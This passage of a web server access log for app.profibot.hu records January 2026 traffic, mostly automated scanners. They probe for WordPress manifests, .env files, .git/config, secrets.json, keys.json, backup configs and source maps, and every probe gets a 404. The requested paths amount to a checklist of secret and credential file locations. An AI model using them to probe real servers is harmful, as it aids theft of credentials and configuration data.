Safari/537.36" "-" +[24/Jan/2026:09:38:44 +0000] - 404 404 - GET http app.profibot.hu "/2020/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:09:38:44 +0000] - 404 404 - GET http app.profibot.hu "/2019/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:09:38:44 +0000] - 404 404 - GET http app.profibot.hu "/2021/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:09:38:44 +0000] - 404 404 - GET http app.profibot.hu "/shop/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:09:38:44 +0000] - 404 404 - GET http app.profibot.hu "/wp1/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:09:38:44 +0000] - 404 404 - GET http app.profibot.hu "/test/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:09:38:44 +0000] - 404 404 - GET http app.profibot.hu "/site/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:09:38:44 +0000] - 404 404 - GET http app.profibot.hu "/cms/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:15:09:27 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 142.248.80.192] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:27 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 142.248.80.192] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:27 +0000] - 404 404 - GET http app.profibot.hu "/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:27 +0000] - 404 404 - GET http app.profibot.hu "/xmlrpc.php?rsd" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:27 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 142.248.80.192] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:27 +0000] - 404 404 - GET http app.profibot.hu "/blog/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:27 +0000] - 404 404 - GET http app.profibot.hu "/web/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:28 +0000] - 404 404 - GET http app.profibot.hu "/wordpress/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:28 +0000] - 404 404 - GET http app.profibot.hu "/website/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:28 +0000] - 404 404 - GET http app.profibot.hu "/wp/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:28 +0000] - 404 404 - GET http app.profibot.hu "/news/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:28 +0000] - 404 404 - GET http app.profibot.hu "/2018/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:28 +0000] - 404 404 - GET http app.profibot.hu "/2019/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:28 +0000] - 404 404 - GET http app.profibot.hu "/shop/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:29 +0000] - 404 404 - GET http app.profibot.hu "/wp1/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:29 +0000] - 404 404 - GET http app.profibot.hu "/test/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:29 +0000] - 404 404 - GET http app.profibot.hu "/media/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:29 +0000] - 404 404 - GET http app.profibot.hu "/wp2/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:29 +0000] - 404 404 - GET http app.profibot.hu "/site/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:29 +0000] - 404 404 - GET http app.profibot.hu "/cms/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:15:09:29 +0000] - 404 404 - GET http app.profibot.hu "/sito/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:18:24:25 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 37.76.2.117] [Length 103] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:18:24:30 +0000] - 200 200 - GET https app.profibot.hu "/docs" [Client 37.76.2.117] [Length 531] [Gzip 1.92] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:18:24:30 +0000] - 200 200 - GET https app.profibot.hu "/api/v1/openapi.json" [Client 37.76.2.117] [Length 2288] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/docs" +[24/Jan/2026:18:24:32 +0000] - 200 200 - GET https app.profibot.hu "/docs" [Client 66.249.81.232] [Length 531] [Gzip 1.92] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[24/Jan/2026:18:24:32 +0000] - 200 200 - GET https app.profibot.hu "/docs" [Client 66.249.81.232] [Length 531] [Gzip 1.92] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[24/Jan/2026:18:24:32 +0000] - 200 200 - GET https app.profibot.hu "/docs" [Client 74.125.215.167] [Length 531] [Gzip 1.92] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[24/Jan/2026:18:24:33 +0000] - 200 200 - GET https app.profibot.hu "/api/v1/openapi.json" [Client 74.125.215.168] [Length 2288] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "https://app.profibot.hu/docs" +[24/Jan/2026:19:20:29 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 84.254.106.197] [Length 103] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:19:20:39 +0000] - 404 404 - GET https app.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:21:19:51 +0000] - 404 404 - GET https app.profibot.hu "/.env.old" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:21:19:51 +0000] - 404 404 - GET https app.profibot.hu "/.env.prod" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:21:19:51 +0000] - 404 404 - GET https app.profibot.hu "/phpinfo.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:21:19:51 +0000] - 404 404 - GET https app.profibot.hu "/config.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[24/Jan/2026:21:19:51 +0000] - 404 404 - GET https app.profibot.hu "/.env.backup" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[24/Jan/2026:21:19:51 +0000] - 404 404 - GET https app.profibot.hu "/.env.production" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:21:19:51 +0000] - 404 404 - GET https app.profibot.hu "/.env.dev" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[24/Jan/2026:21:19:51 +0000] - 404 404 - GET https app.profibot.hu "/.env.local" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[24/Jan/2026:21:44:05 +0000] - 404 404 - GET https app.profibot.hu "/_profiler/phpinfo" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:21:44:05 +0000] - 404 404 - GET https app.profibot.hu "/.env.bak" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:21:44:05 +0000] - 404 404 - GET https app.profibot.hu "/.git/config" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[24/Jan/2026:21:44:05 +0000] - 404 404 - GET https app.profibot.hu "/secrets.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:21:44:05 +0000] - 404 404 - GET https app.profibot.hu "/phpinfo.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:21:44:05 +0000] - 404 404 - GET https app.profibot.hu "/wp-content/phpinfo.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:21:44:05 +0000] - 404 404 - GET https app.profibot.hu "/wp-config.php.bak" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[24/Jan/2026:21:44:05 +0000] - 404 404 - GET https app.profibot.hu "/info.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:21:44:07 +0000] - 404 404 - GET https app.profibot.hu "/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:21:44:07 +0000] - 404 404 - GET https app.profibot.hu "/api/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:21:44:07 +0000] - 404 404 - GET https app.profibot.hu "/application.yml" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:21:44:07 +0000] - 404 404 - GET https app.profibot.hu "/test/phpinfo.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:21:44:09 +0000] - 404 404 - GET https app.profibot.hu "/include/config.php.bak" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:23:41:39 +0000] - 404 404 - GET https app.profibot.hu "/.env" [Client 45.139.104.168] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 9; ONEPLUS A5000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" +[24/Jan/2026:23:53:18 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 149.57.180.97] [Length 103] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[25/Jan/2026:02:18:52 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 149.57.180.9] [Length 103] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[25/Jan/2026:02:48:16 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 165.22.225.228] [Length 103] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[25/Jan/2026:02:48:16 +0000] - 404 404 - GET http app.profibot.hu "/favicon.ico" [Client 165.22.225.228] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "http://app.profibot.hu/" +[25/Jan/2026:02:48:17 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 165.22.225.228] [Length 103] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[25/Jan/2026:02:48:20 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 165.22.225.228] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "https://app.profibot.hu/" +[25/Jan/2026:10:26:40 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 134.209.227.157] [Length 103] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[25/Jan/2026:10:26:40 +0000] - 404 404 - GET http app.profibot.hu "/favicon.ico" [Client 134.209.227.157] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "http://app.profibot.hu/" +[25/Jan/2026:10:26:40 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 134.209.227.157] [Length 103] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[25/Jan/2026:10:26:41 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 134.209.227.157] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "https://app.profibot.hu/" +[25/Jan/2026:21:22:19 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 216.81.248.89] [Length 67] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/runtime.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/vendor.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/dist/bundle.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/build/static/js/bundle.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_astro/client.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/static/js/main.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/env.json" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/service-worker.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/build/asset-manifest.json" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/main.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/.env.vite" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/index.html" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/cart" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/dist/main.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/keys.json" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/config/index.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/dist/main.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/runtime.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/manifest.json" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/public/page-data/app-data.json" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/main.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/subscribe" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/payment" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/dist/solid.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/js/app.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/build/main.js.map" [Client 